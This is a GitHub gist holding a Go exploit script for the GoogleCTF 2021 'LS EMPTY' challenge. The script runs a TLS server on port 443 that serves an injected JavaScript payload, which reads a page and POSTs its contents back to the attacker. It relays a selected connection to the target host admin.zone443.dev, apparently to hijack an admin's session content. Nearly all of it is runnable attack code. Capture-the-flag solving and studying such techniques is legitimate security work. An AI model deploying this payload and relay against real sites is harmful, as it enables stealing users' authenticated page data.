Last active
August 29, 2021 15:07
-
-
Save hatunaa/7d0574ccd3e9400d5508df5cf3f591e2 to your computer and use it in GitHub Desktop.
LS EMPTY, GoogleCTF 2021
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
import ( | |
"crypto/tls" | |
"fmt" | |
"io" | |
"io/ioutil" | |
"net" | |
"net/http" | |
"sync" | |
log "github.com/Sirupsen/logrus" | |
) | |
type fakeListener struct { | |
conn <-chan net.Conn | |
addr net.Addr | |
} | |
func (f *fakeListener) Accept() (net.Conn, error) { return <-f.conn, nil } | |
func (f *fakeListener) Close() error { return nil } | |
func (f *fakeListener) Addr() net.Addr { return f.addr } | |
// language=html | |
const payload = `<script> | |
fetch(new Request('/')).then(resp => resp.text()).then(function (body) { | |
return fetch(new Request('/', { | |
method: "POST", | |
body: body, | |
})); | |
}); | |
</script>` | |
func handle(writer http.ResponseWriter, request *http.Request) { | |
log.Info("url ", request.URL) | |
if request.Method == http.MethodPost { | |
all, err := ioutil.ReadAll(request.Body) | |
if err != nil { | |
log.Error(err) | |
return | |
} | |
fmt.Println(string(all)) | |
_, _ = writer.Write(nil) | |
} else { | |
_, err := io.WriteString(writer, payload) | |
if err != nil { | |
log.Error(err) | |
} | |
} | |
} | |
func redirect(conn net.Conn) { | |
defer conn.Close() | |
dial, err := net.Dial("tcp", "admin.zone443.dev:443") | |
if err != nil { | |
log.Println(err) | |
return | |
} | |
log.Info("start copying...") | |
var wg sync.WaitGroup | |
wg.Add(2) | |
defer wg.Wait() | |
go func() { | |
defer wg.Done() | |
if _, err := io.Copy(dial, conn); err != nil { | |
log.Error(err) | |
} | |
}() | |
go func() { | |
defer wg.Done() | |
if _, err := io.Copy(conn, dial); err != nil { | |
log.Error(err) | |
} | |
}() | |
} | |
func main() { | |
cert, err := tls.LoadX509KeyPair("fullchain.pem", "privkey.pem") | |
if err != nil { | |
log.Panic(err) | |
} | |
config := &tls.Config{Certificates: []tls.Certificate{cert}} | |
listen, err := net.Listen("tcp", "0.0.0.0:443") | |
if err != nil { | |
log.Panic(err) | |
} | |
defer listen.Close() | |
ch := make(chan net.Conn) | |
listener := &fakeListener{conn: ch, addr: listen.Addr()} | |
go func() { | |
log.Fatal(http.Serve(listener, http.HandlerFunc(handle))) | |
}() | |
var count int | |
for { | |
conn, err := listen.Accept() | |
log.Info("new connection...") | |
if err != nil { | |
log.Panic(err) | |
} | |
count++ | |
if count == 2 { | |
go redirect(conn) | |
} else { | |
ch <- tls.Server(conn, config) | |
} | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment